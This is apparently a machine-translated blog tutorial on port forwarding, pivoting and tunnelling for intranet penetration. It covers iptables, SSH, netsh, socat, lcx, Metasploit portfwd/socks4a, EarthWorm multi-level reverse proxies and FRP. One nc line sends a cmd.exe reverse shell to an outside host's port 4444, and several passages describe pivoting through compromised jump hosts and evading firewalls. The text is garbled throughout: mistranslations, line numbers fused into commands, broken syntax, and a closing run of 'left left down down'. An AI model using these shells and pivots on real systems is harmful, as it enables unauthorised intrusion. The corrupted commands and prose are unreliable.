Port forwarding in Intranet penetration
Need to know, in the whole process of penetration, penetration, according to web applications or open ports for webshell is only a part of the penetrating this art, in the real complex enterprise environment for network penetration, deep water, actually involves the network transmission, port forwarding, domain seepage, mention right and so on a series of problems. So this article makes some records of Intranet osmotic learning. In this process, I referred to the valuable experience of many predecessors. I collected these links and put them in the references section.
Second, forwarding, mapping, proxy
These concepts are quite difficult to distinguish, especially when they are mixed up with the internal network penetration behind them. At a macro level, they are not very different. But there is a big difference in nature. Now I would like to give my personal understanding of these concepts:
Forwarding: Forwarding is a means of infiltration. It is the act of forwarding a network port from one network node to another node. The result is that an extranet user reaches a port at an Intranet IP address through a NAT router. Sometimes called a tunnel.
Mapping: Mapping is also a means of infiltration. Port mapping is to map a port of the IP address of an extranet host to a machine on the Intranet to provide corresponding services. In fact, a lot of times forward and map
Proxy: Proxy is a result, based on port forwarding and mapping technologies. Proxy is used in many cases for Web services connected to the Internet to break IP blockade and conceal identity. The principle is dynamic port forwarding. A tunnel needs to be established between the host and the agent, and the agent can dynamically obtain the address and port of the chain according to the request initiated by the host.
Intranet penetration: Intranet penetration is the purpose. The means used include port forwarding and mapping, or the direct use of proxies. Most of the time, we refer to the Intranet penetration scenario, which means that the attack plane and the target plane are in different Intranet, and some means such as rebound shell can be directly implemented, because IP addresses cannot be connected to each other. This is when you need to use some common tools for Intranet penetration. These tools also use port forwarding and mapping or similar methods to push the envelope.
3. Built-in forwarding tool of the system
The iptables NAT
In Linux, the system parameter /proc/sys/net/ipv4/ip_forward is set to 0 by default for security reasons, so NAT is disabled. You can modify the system running parameters in the following two ways:
A temporary solution
1echo 1 >/proc/sys/net/ipv4/ip_forward
Copy the codeLong-term plan
Run the vi/etc/sysctl. Conf
1# Find the following value and change 0 to 1 2 3net.ipv4.ip_forward = 1Copy the codeRun sysctl -p for the changes to take effect immediately.
Here is an example of forwarding
192.168.2.2 Intranet IP address 2iptables -t NAT -a PREROUTING -p TCP -d 1.1.1.1 --dport 80 -j DNAT --to-destination 192.168.2.2:8080 3 4iptables -t NAT -a POSTROUTING -p TCP -s 192.168.2.2 --sport 8080 -j SNAT --to-source 1.1.1.1 5 6service iptables saveCopy the codeThis maps access to 1.1.1.1:80 to 192.168.2.2:8080. Notice here
nc
5nc-t -e cmd.exe Public network host IP address 4444Copy the codeSSH
1# Local port forwarding 2ssh-cfng -l port1:127.0.0.1:port2 user@host 3 Parameters: -l Local NIC ADDRESS: local port: Destination IP address: destination port 4 5# Remote port forwarding: 6ssh-cfng -r port2:127.0.0.1:port1 user@hsst 7 Parameters: -r Remote NIC ADDRESS: remote port: Destination IP address: destination port 8 9# Dynamic port Forwarding 10ssh -d localhost:2000 [email protected] 11 Parameter: -d Local NIC address: local portCopy the codenetsh
Netsh is a command line tool for network management under Windows. It is an interactive shell and involves the concept of context. We enter the corresponding context under interactive and set the parameters. Port forwarding can also be performed non-interactively as follows.
1netsh interface ipv6 install 2# forward 3netsh interface PortProxy add v4TOV4 listenAddress =10.10.18.1 ListenPort =4455 6netsh interface portProxy delete v4toV4 listenAddress ={B's IP} Listenport ={B's port}Copy the code
4. Non-built-in port forwarding tools
socat
The port forwarding function of SOCAT is used to capture packets locally when the SSRF constructs the payload, because SOCAT records the forwarding flow. Socat was used as the intermediary to capture the payload packet we constructed, and then we carried out further operations, such as gopher construction.
1 # 2 installation yum install - y socat 3 apt install - y socat 4 # 5 TCP nohup 6 socat TCP4 - LISTEN: 10000, reuseaddr, fork TCP4:1.1.1.1:10000 7 8tcp4-LISTEN :10000 Listens to 10000TCP port of ipv4. 9fork tcp4:1.1.1.1:10000 Forward packets to port 10000 of 1.1.1.1. Modify the IP address and port as required. 10NohUp Runs in the background. You can write this command to /etc/rc.local. # 11 12 13 nohup UDP socat UDP4-600 - T LISTEN: 10000, reuseaddr, fork UDP4:1.1.1.1:10000Copy the codelcx.exe
1 LCX - < listen | tran | slave > < option > [- log logfile] [option:] 2, 3, 4 - listen < listen on port > < forwarding port > 5 6 - tran < listen on port > target address > < < target port > 7 8 -slave < target host >< Target Port >< local host >< Local Port > 9 10 11 Run the following command on the Intranet: 12lcx.exe -slave Public IP address + Port Internal IP address + port 13 Example: Exe -slave 192.168.43.142 51 192.168.43.137 3389 15 Run the following command on the public network: 16lcx. exe - Listen Listen to port 51 and forward the listen to port 3389 on the public network: 18 LCX. Exe - listen to 51, 3389Copy the codeMetasploit socks4a
A group of three sets in the actual penetration process: routing table + SOckS4A + Proxychains. In this way, you can use the penetration tool on the attack machine to use the Meterpreter session as a springboard to penetrate the Intranet. Here’s the flow.
11. Add a route to the bounced shell, for example, 2run autoroute -s 192.168.122.0/24 32. Use the SOcks4A module and set port 4Use AUXILIARY/Server/socks4A 53. Configuration proxychainsCopy the codeMeterpreter portfwd
The command of port forwarding is built into the MSF penetration framework, which can be used directly under the condition of shell rebound. Relevant parameters are analyzed in the following formula.
1 meterpreter > portfwd - h 2 usage: portfwd [-h] [add | delete | | list are flush] (args), 3, 4, 5 options: 6, 7 - L < opt > forward: Local listening address reverse: 8 -r indicates forward and reverse ports 9 -h Help information 10 -I <opt> Index and interaction of port forwarding entries (see "List" command) 11 -L <opt> Forward: local port listening Reverse: local port connection 12 -p <opt> Forward: 13 -r <opt> Forward: Connect to the remote host 14 15 16 Example: 17portfwd -l 127.0.0.1 -L 1212 -r 10.10.12.1 -p 3389Copy the code
Rinetd
Centos does not have its default software source, so you need to manually import it. Repos. D /nux-misc. Repo 4[nux-misc] 5name= nux misc 6baseurl=http://li.nux.ro/download/nux/misc/el6/i386/ 7enabled=0 8gpgcheck=1 9gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro 10 11#centos 64 12$ vim /etc/yum.repos.d/nux-misc.repo: 13 14[nux-misc] 15name=Nux Misc 16baseurl=http://li.nux.ro/download/nux/misc/el6/x86_64/ 17enabled=0 18gpgcheck=1 19gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro 20 21$ yum --enablerepo=nux-misc install rinetd 22 23# ubuntu $apt-get install rinetd $apt-get install rinetd Configuration Parameter Format 27[bindAddress] [bindPort] [ConnectAddress] [connectPort] 28 Bound Address Bound port Address Connected port 29 30[Source Address] [Source Port] [Destination Address] [Destination Port] 31 Source Address Source Port Destination Address Destination Port 32 33# Example 34$vim /etc/rinetd.conf 35 360.0.0.0 8080 172.19.94.3 8080 370.0.0.0 2222 192.168.0.103 3389 381.2.3.4 80 192.168.0.10 80 39Allow *.*.*.* 40logfile /var/log/rinetd.log 41 42# Explanation 430.0.0.0 means that the host binds all available addresses 44 Forward all requests to port 8080 on the host to port 8080 on 172.19.94.3 45 Forward all requests sent to port 2222 to port 3389 at 192.168.0.103. 46 Forward all requests sent to port 80 at 1.2.3.4 to port 80 at 192.168.0.10. 47Allow Specify the IP addresses that are allowed to access 48logfil set the location of the printed log 49 50# run 51# script start 52$/etc/init.d/rinetd start 53 54# binary start 55$/usr/sbin/rinetd -c /etc/rinetd.conf $/etc/init.d/rinetd stopCopy the codeTunna with reGeorg
Both of these tools are fairly simple to use without further ado, but once you get the Webshell, you can do port forwarding over HTTP. Give two project addresses directly, recommend using reGeorg, Tunna unstable. Tunna tool address
Localtunnel and Gnork
Both tools can map ports on the Intranet to the public network, and the IP address accessing the public network is similar to that accessing ports on the Intranet. These two tools can either provide a built-in service or use the server it provides for Intranet penetration. Such tools are not often used in actual penetration. A more direct scenario is that the attack aircraft is on the internal network, and the target machine needs to be reachable when performing related link back operations. After all, they are only level 1 forwarding, and the operation is troublesome. Give the project address directly
Github.com/localtunnel…
ngrok.com/
EW
The address of the tool is rootkiter.com/EarthWorm/
This is a domestic hole-making artifact, because of its convenient multi-level forwarding, support reverse proxy and other characteristics, in the field of Intranet penetration but rang. It’s important to note that this tool is really powerful
The tool has six command formats (ssockSD, RCSOCKS, rsSOCKS, LCX_slave, LCX_LISTEN, and LCX_TRAN). The official example is explained as follows:
Forward agent
1$ ./ew -s ssocksd -l 1080
Copy the codeIf port 1080 of the machine is enabled to do forward proxy, port proxy forwarding can be carried out by linking port 1080 of the machine. The general scenario is as follows: Kali enables the forward proxy public IP address through the proxychain link.
Response to the agent
1# Public IP Host A, whose IP address is assumed to be 1.1.1.1 2./ ew-s rcSOCKS -l 1080-E 8888 3Copy the codeReverse proxy is different from forward proxy, where the target sends a link request to us. When A link is established, its proxy flow looks like Me<– >A<– >B. That is, AS long as I connect port 1080 of A, I can get A reverse proxy tunnel and establish A connection with B. This scenario can be used to bypass firewalls with strict entry policies but loose exit policies.
Multistage forwarding
In the previous two scenarios, we saw the use of rcSOCKS, ‘ssocksd, and rsSOCKS. We’ll see the other three commands in action in multi-level forwarding. They act as middleware, responsible for tunnel diversion and linking.
1# command example: 2# lCX_LISTEN is used to forward the local port. 3$./ ew-s lCX_LISTEN -l 1080 -e 8888 4# lCX_tran Forwards the local port to the destination IP address. 5$./ ew-s lCX_TRAN-l 1080 -f 2.2.2.3 -g 9999 6# lcx_slave as slave, 7$./ew -s lCX_slave -d 1.1.1.1 -E 8888 -f 2.2.2.3 -g 9999 7$./ew -s lCX_slave -d 1.1.1.1 -E 8888 -f 2.2.2.3 -g 9999Copy the codeLet’s take a look at an example of an actual three-level infiltration cascade:
1# Our own VPS execute 2$./ew -s RCSOCKS -L 1080 -E 8888 3 4# Jumper A execute 5$./ew -s lCX_slave -d ip_A -E 8888 -f ip_B -g 9999 6 7# For jumper B, go to 8$./ ew-s lCX_LISTEN -L 9999 -e 7777 9 10# For jumper C, go to 11$./ ew-s rsSOCKS -d ip_B -E 7777Copy the codeSOCKS V5 -> 1080 -> 8888 -> 9999 -> 7777 -> RSSOCKS.
First, this is an example of reverse proxy. The destination port of the reverse proxy is 7777 of C. When the tunnel is established, we only need to connect to port 1080 of VPS, and it will automatically forward us to 7777. Let’s take a look at the intermediate process: first the first command VPS receives the reverse proxy at 8888 and waits for our connection at 1080. The second command directs port 8888 of jumper A to 9999. The third line directs port 9999 of jumper B to 7777. Finally, the fourth command is reverse proxy initiated on the springboard connected to port 7777 of jumper B.
FRP
FRP also provides complete Intranet penetration capabilities, similar to those of gNORk, but more flexible than FRP configuration. Recommended layering: FRP>Localtunnel> Gnork
Five, through the wall tunnel
The port forwarding mentioned above uses HTTP protocol, TCP protocol and SOCKTS proxy. However, the traffic forwarded by these protocols is too troublesome and is easily filtered by strict firewall rules, resulting in the shell cannot come out from the Intranet. In this case, we need a strong tunnel through the wall. The following is the author in the Internet search for some of the UDP DNS tunnel and icmp tunnel, can say that these two holes are very ingenious, the author looked at it is amazing. Here first the relevant tool links and read the data down. I can’t write… , avoid being too long (or lazy) and fill in the blanks next time. Left left left left left left left left left left down down down down down down down down down left left left left left left left left left left down down down down down down down down down left left left left left left left down down down down down down
